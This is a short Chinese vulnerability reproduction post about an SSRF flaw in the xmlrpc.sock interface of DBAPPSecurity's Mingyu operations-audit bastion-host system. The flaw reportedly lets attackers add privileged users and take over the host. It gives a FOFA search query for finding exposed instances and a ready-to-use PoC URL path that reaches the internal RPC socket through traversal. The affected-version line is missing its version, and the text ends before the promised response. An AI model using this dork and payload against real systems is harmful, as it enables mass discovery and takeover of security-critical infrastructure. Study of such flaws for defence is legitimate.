简介
明御®运维审计与风险控制系统是安恒信息在多年运维安全管理的理论和实践经验积累的基础上,采用B/S架构,集“身份认证、账户管理、控制权限、日志审计”于一体,支持多种字符终端协议、文件传输协议、图形终端协议、远程应用协议的安全监控与历史查询,具备全方位运维风险控制能力的统一安全管理与审计产品。
危害
明御运维审计与风险控制系统 xmlrpc.sock 接口存在SSRF漏洞,通过漏洞可以添加除超级管理员权限的其他权限用户从而控制堡垒机。
影响版本
以及之前的版本
漏洞复现
FOFA语法: "明御运维审计与风险控制系统"
POC:
/service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc
直接拼接url访问返回信息如下: